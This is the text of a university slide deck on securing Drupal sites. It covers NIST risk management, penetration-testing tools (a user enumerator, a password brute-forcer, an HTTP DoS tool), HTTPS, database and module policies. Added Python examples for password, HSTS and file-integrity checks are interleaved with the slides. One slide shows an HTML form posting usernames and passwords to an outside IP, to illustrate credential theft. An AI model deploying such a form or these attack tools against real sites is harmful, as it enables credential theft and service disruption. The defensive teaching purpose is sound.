One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood
Eric Samboy
Hayden Bacon
2
The day I came to the USA
3
Beautiful Country
4
Ready for crossing the street?
5
Quick Warmup
6
Website Hacking Statistics
• 1.86 billion websites on the internet.
• 1% of these websites are known to be infected.
[0] https://www.securityweek.com/185-million-websites-infected-malware-any-time
[1] https://www.webarxsecurity.com/website-hacking-statistics-2018-february/
7
How does SASG use Drupal?
• About 100 Drupal UA websites.
• UA Quickstart & UA Zen
8
How big is Drupal?
• One of the largest open source communities in the world.
• Used by more than 1 million sites on the internet.
• 800 thousand Drupal 7.x
• 225 thousand Drupal 8.x
9
Security Concerns
• Greater risk of being attacked.
• More vulnerabilities are discovered and exploited
• How do we keep our web infrastructure safe?
https://www.keycdn.com/blog/drupal-security
10
Outline
• Our Drupal Security Policies
  • Drupal Modules
  • Drupal Core
  • Access Control
  • Security Awareness
• UA Cybersecurity Framework
  • Risk Management & Analysis
  • Security Best Practices
11
Our Drupal Security Policies
• Keep Drupal and Modules updated
• Access Control
• Security Awareness
• Contributed Modules Installation
12
Our Drupal Security Policies
Contributed Modules Installation
13
Risk Management
• Guidance to mitigate cyber risks
National Institute of Standards and Technology (NIST) Framework
• Best practice
• Business continuity plan
https://confluence.arizona.edu/display/UAIS/UA+Cybersecurity+Framework+and+Risk+Assessment
14
Risk Management
• Asset Management
• Business Environment
• Governance
• Risk Assessment
• Risk Management Strategy
15
Risk Management
• Access Control
• Awareness & Training
• Data Security
• Policies & Procedures
• Maintenance
• Protective Technology
16
Risk Management
• Anomalies & Events
• Continuous Monitoring
• Detection Processes
17
Risk Management
• Response Planning
• Communications
• Analysis
• Mitigation
• Improvements
18
Risk Management
• Recovery Planning
• Improvements
• Communications
Conclusion
19
What to take away.
• Doors are only as secure as their locks.
• We all have the responsibility to follow best practice.
And now…
20
Hayden will cover:
• Drupal Penetration Testing
• More Security Policies
• Drupal statistics
• Being afraid, but not too afraid
Drupal Penetration Testing
21
1. What do we look for?
2. What tools do we use?
Drupal Penetration Testing
22
What to look for
• HTTP or HTTPS
• Drupal version
• PHP version
• Apache version
• OS version
• Reverse Proxies
• Custom Modules
• Passwords
Drupal Penetration Testing
23
Drupwn
What tools we use
Enumeration tool:
• User enumeration
• Node enumeration
• Default files enumeration
• Module enumeration
• Theme enumeration
• Cookies support
• User-Agent support
• Basic authentication support
• Request delay
• Enumeration range
• Logging
• Socks and HTTP proxy support
Drupal Penetration Testing
24
Drupwn
What tools we use
Drupal Penetration Testing
25
X Brute Forcer
What tools we use
Brute force passwords for:
• WordPress
• Joomla
• Drupal
• OpenCart
• Magento
Drupal Penetration Testing
26
X Brute Forcer
What tools we use
Drupal Penetration Testing
27
X Brute Forcer
What tools we use
Drupal Penetration Testing
28
X Brute Forcer
What tools we use
Drupal Penetration Testing
29
Switchblade HTTP DoS Tool
What tools we use
Drupal Penetration Testing
30
OWASP Switchblade
What tools we use
Drupal Penetration Testing
31
OWASP Switchblade
What tools we use
32
More Drupal Security Policies
• Serve over HTTPS
• File permissions
• Secure connections
• Database Security
• Hardened HTTPS Security
• Drupal Security Modules
33
More Drupal Security Policies
Why serve over HTTPS?
34
More Drupal Security Policies
Why serve over HTTPS?
“All websites should use HTTPS, even if they don't include private content, sign-in pages, or credit card details.” - UK National Cyber Security Centre
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
35
More Drupal Security Policies
Why serve over HTTPS?
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
36
More Drupal Security Policies
Why serve over HTTPS?
<form action="http://34.218.2.81/notyourform" method="POST">
<input name="username" value="username">
<input name="password" value="password">
</form>
37
More Drupal Security Policies
Why serve over HTTPS?
<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
38
More Drupal Security Policies
Why serve over HTTPS?
39
More Drupal Security Policies
Use only secure connections:
40
More Drupal Security Policies
Use only secure connections:
41
More Drupal Security Policies
Databases:
42
More Drupal Security Policies
Database Best Practices:
• Use different database credentials between environments.
• Use a longer random password, which should not contain special characters, except : @ . , / + - ! =
• Use a random table name prefix.
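The three database rules above can be enforced in code. This is an added example, not code from the deck or from Drupal: it generates a password from the character set the slide allows, generates a random table prefix, and checks that no two environments share credentials. The minimum length of 24 is an assumption; the slide only says "longer".

```python
import secrets
import string

# Character set implied by the slide's policy: letters, digits and only the
# listed specials, which are safe inside Drupal's $databases array and in
# DSN-style connection strings.
ALLOWED_SPECIALS = ":@.,/+-!="
ALLOWED = string.ascii_letters + string.digits + ALLOWED_SPECIALS
MIN_LENGTH = 24  # assumption: the slide only says "longer"


def generate_db_password(length: int = 32) -> str:
    """Return a CSPRNG password drawn only from the allowed character set."""
    if length < MIN_LENGTH:
        raise ValueError("policy asks for a longer password")
    return "".join(secrets.choice(ALLOWED) for _ in range(length))


def generate_table_prefix(length: int = 6) -> str:
    """Return a random prefix such as 'k7x2q9_' for $databases[...]['prefix']."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length)) + "_"


def password_conforms(password: str, min_length: int = MIN_LENGTH) -> bool:
    """True if the password is long enough and uses only allowed characters."""
    return len(password) >= min_length and all(c in ALLOWED for c in password)


def credentials_distinct(envs: dict) -> bool:
    """True if no two environments (dev, stage, prod, ...) share a user/password pair."""
    pairs = [(e["user"], e["password"]) for e in envs.values()]
    return len(pairs) == len(set(pairs))
```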
43
More Drupal Security Policies
HTTP Strict-Transport-Security:
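The "Why serve over HTTPS?" slides and the HSTS slide above state the policy; as an added example that is not from the deck, this Python check takes a plain-HTTP response and the HTTPS response for the same site and reports whether the redirect and the Strict-Transport-Security header meet it. The response dictionaries are constructed samples, not captures from any site, and the one-year max-age threshold is an assumption; public key pinning is not covered.

```python
from urllib.parse import urlsplit

# Constructed sample responses (not captured from a real site).
HTTP_RESPONSE = {"status": 301, "headers": {"Location": "https://www.example.edu/"}}
HTTPS_RESPONSE = {"status": 200, "headers": {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"}}

ONE_YEAR = 365 * 24 * 3600  # assumed minimum max-age for a hardened policy


def parse_hsts(value: str) -> dict:
    """Parse an HSTS header value into its max-age and boolean directives."""
    policy = {"max-age": None, "includesubdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age" and arg.strip('"').isdigit():
            policy["max-age"] = int(arg.strip('"'))
        elif name in ("includesubdomains", "preload"):
            policy[name] = True
    return policy


def check_https_posture(http_resp: dict, https_resp: dict) -> list:
    """Return a list of findings; an empty list means the site meets the policy."""
    findings = []
    location = http_resp["headers"].get("Location", "")
    # Only permanent redirects (301/308) to an https:// URL count.
    if http_resp["status"] not in (301, 308) or urlsplit(location).scheme != "https":
        findings.append("plain HTTP is not permanently redirected to HTTPS")
    # Browsers ignore HSTS sent over plain HTTP, so only the HTTPS response matters.
    hsts = https_resp["headers"].get("Strict-Transport-Security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header on the HTTPS response")
    else:
        policy = parse_hsts(hsts)
        if policy["max-age"] is None:
            findings.append("HSTS max-age missing or malformed")
        elif policy["max-age"] < ONE_YEAR:
            findings.append("HSTS max-age shorter than one year")
        if not policy["includesubdomains"]:
            findings.append("HSTS does not cover subdomains")
    return findings
```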
44
More Drupal Security Policies
Public Key Pinning:
45
More Drupal Security Policies
These modules can help you:
• Login Security: Limit the number of login attempts and deny access by IP address.
• ACL: Access control lists for access to nodes.
• Password policy: Define stricter password policies for users.
• Captcha: Block form submissions from spambots/scripts.
• Automated Logout: Allows an administrator to log out users after a specified time period.
• Session Limit: Limit the number of simultaneous sessions per user.
• Content Access: Permissions for content types by role and author.
• Coder: Checks your Drupal code against coding standards and best practices.
• SpamSpan filter: Obfuscates email addresses to help prevent spambots from collecting them.
• Hacked!: Check to see if there have been changes to Drupal core or themes.
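The last module in the list, Hacked!, detects changes to core and themes by comparing the files on disk with the clean release. As an added example that is not the module's code, here is the same idea with a locally stored baseline: hash every file under a tree after a clean install or update, then diff a later hash set to find modified, added and removed files. The demo builds a tiny constructed fake Drupal tree in a temporary directory; in practice the baseline would be kept off the web host so an intruder cannot rewrite it.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root: str) -> dict:
    """Map each file path (relative to root, POSIX form) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Return files that were modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed demo: hash a tiny fake Drupal tree, tamper with it, then diff."""
    with tempfile.TemporaryDirectory() as root:
        mod = Path(root) / "modules" / "system"
        mod.mkdir(parents=True)
        (mod / "system.module").write_text("<?php // pristine release file\n")
        (mod / "system.info").write_text("name = System\n")
        baseline = build_manifest(root)  # taken right after a clean install or update
        # Simulate what an intrusion leaves behind: an edited core file, a dropped
        # file that was never part of the release, and a deleted file.
        (mod / "system.module").write_text("<?php // edited after deployment\n")
        (mod / "x.php").write_text("<?php // not part of the release\n")
        (mod / "system.info").unlink()
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(demo())
```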
46
326 Vulnerabilities Reported
47
326 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
48
328 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
What are attackers using?
49
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
What are attackers using?
50
Backdoor: Artifacts used to re-infect or retain access.
Malware: Generic browser-side code to trigger malware downloads.
SEO Spam: Create dummy content with backlinks to another website, to boost SEO.
Mailer: Abuse server resources to send spam email.
Phishing: Attempts to trick users into sharing sensitive information.
55
Drupal is Lucky
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
56
% of top 10M websites CMS Market Share
[0] https://w3techs.com/technologies/overview/content_management/all
Drupal is Lucky
57
Drupal is Lucky
[0] https://w3techs.com/technologies/overview/content_management/all
[1] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
58
Drupal is Lucky
1. Alex Bronstein (effulgentsia) - IRC nick: effulgentsia, Organization: Acquia
2. Alex Pott (alexpott) - IRC nick: alexpott, Organization: Acro Media, Thunder
3. Angie Byron (webchick) - IRC nick: webchick, Organization: Acquia
4. Ben Dougherty (benjy) - IRC nick: benjy, Organization: PreviousNext
5. Ben Jeavons (coltrane) - IRC nick: coltrane, Organization: CARD.com
6. Cash Williams (cashwilliams) - IRC nick: CashWilliams, Organization: Acquia
7. Cathy Theys (YesCT) - IRC nick: YesCT, Organization: BlackMesh
8. Chris McCafferty (cilefen) - IRC nick: cilefen, Organization: Institute for Advanced Study
9. Damien McKenna (DamienMcKenna) - IRC nick: dmckenna, Organization: Mediacurrent
10. Dan Smith (galooph) - IRC nick: galooph, Organization: Code Enigma
11. Dave Reid (Dave Reid) - IRC nick: davereid, Organization: Lullabot
12. David Rothstein (David_Rothstein) - IRC nick: David_Rothstein, Organization:
13. David Snopek (dsnopek) - IRC nick: dsnopek, Organization: myDropWizard
14. David Stoline (dstol) - IRC nick: dstol, Organization: Acquia
15. David Strauss (David Strauss) - IRC nick: davidstrauss, Organization: GetPantheon
16. Dries Buytaert (Dries) - IRC nick: Dries__, Organization: Acquia
17. Gerhard Killesreiter ([email protected]) - IRC nick: killes, Organization:
18. Greg Knaddison (greggles) - IRC nick: greggles, Organization: CARD.com
19. Heine Deelstra (Heine) - IRC nick: Heine, Organization: LimoenGroen
20. Ivo Van Geertruyen (mr.baileys) - IRC nick: mrbaileys, Organization: Calibrate
21. James Gilliland (neclimdul) - IRC nick: neclimdul, Organization: APQC
22. Lee Rowlands (larowlan) - IRC nick: larowlan, Organization: PreviousNext
23. Michael Hess (mlhess) - IRC nick: digiv, Organization: University of Michigan
24. Mike Potter (mpotter) - IRC nick: mpotter, Organization: Phase2
25. Mori Sugimoto (dokumori) - IRC nick: dokumori, Organization: Share & Thrive
26. Moshe Weitzman (moshe weitzman) - IRC nick: moshe_work, Organization:
27. Nathaniel Catchpole (catch) - IRC nick: catch, Organization: Tag1 Consulting
28. Neil Drumm (drumm) - IRC nick: drumm, Organization: Drupal Association
29. Peter Wolanin (pwolanin) - IRC nick: pwolanin, Organization: BioRAFT
30. Stefan Ruijsenaars (stefan.r) - IRC nick: stefan_r, Organization: Ruijsenaars Development
31. Stella Power (stella) - IRC nick: stella, Organization: Annertech
32. xjm (xjm) - IRC nick: xjm, Organization: Acquia
59
In Conclusion